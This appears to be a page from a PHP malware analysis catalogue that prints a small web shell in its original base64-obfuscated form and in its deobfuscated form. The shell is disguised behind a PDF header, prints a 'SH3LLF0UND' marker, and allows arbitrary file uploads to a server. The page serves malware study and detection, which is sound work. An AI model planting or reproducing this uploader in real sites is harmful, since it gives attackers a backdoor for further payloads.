PHP Malware Analysis

Back to list

Tags

Input
_POST

Deobfuscated code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php 
print_r("SH3LLF0UND");
if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}


Original code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>